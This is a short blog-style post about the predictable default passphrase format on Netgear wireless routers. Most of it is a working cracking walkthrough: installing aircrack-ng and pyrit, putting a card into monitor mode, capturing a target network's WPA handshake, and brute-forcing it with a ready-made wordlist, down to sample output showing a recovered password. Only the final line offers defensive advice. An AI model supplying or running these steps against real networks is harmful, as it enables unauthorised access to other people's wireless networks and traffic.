Netgear Wireless Router Default Passphrase Vulnerability

July 01, 2016 — metalkey

OS: Debian 8

A vulnerability exists in the default passphrase for Netgear Wireless Routers. The default passphrase consists of two words, followed by a three digit number (http://support1.gearguy.com/useruploads/images/19915v3.PNG):
word1word2xxx

To exploit this vulnerability you will need “aircrack-ng”, “pyrit” and the wordlist containing all possible passphrases. Initially, i was going to generate the dictionary using /usr/share/dict/cracklib-small and “crunch”, but the Netgear dictionary is already available for download from ScriptKitty (http://www.scriptkitty.ca/index.php/wordlists/).

Installation of Required Software

Manual step-by-step instructions @ blackMORE Ops (http://www.blackmoreops.com/2014/03/13/install-nvidia-driver-kernel-module-cuda-and-pyrit-kali-linux/)




user@debian8:~$ sudo apt-get install aircrack-ng

user@debian8:~$ sudo apt-get install pyrit

Step 1 – Capturing the Handshake

Plug in your Alfa AWUS036H and capture the 4-way handshake.
Tutorial @ SecurityTube - http://www.securitytube.net/groups?operation=view&groupId=9




user@debian8:~$ airmon-ng start wlan0

user@debian8:~$ airodump-ng mon0

user@debian8:~$ airodump-ng -c 1 -w netgear.cap --bssid 00:11:22:33:44:55 mon0

Step 2 – Cracking the Capture

Confirm you have useable handshakes, then clean up the capture file and crack the passphrase.




user@debian8:~$ pyrit -r netgear.cap analyze

user@debian8:~$ pyrit -r netgear.cap -o stripped-netgear.cap strip

user@debian8:~$ pyrit -r stripped-netgear.cap -i adjective_noun_3d.txt -b 00:11:22:33:44:55 attack_passthrough

...

Parsing file 'stripped-netgear.cap' (1/1)...

Parsed 10 packets (10 802.11-packets), got 1 AP(s)

Tried 12235614 PMKs so far; 25683 PMKs per second.

The password is 'magicalsquash835'

Solution

Never use the default passphrase provided with your router and always use complex passwords that do not follow predictable patterns.

Tags: wifi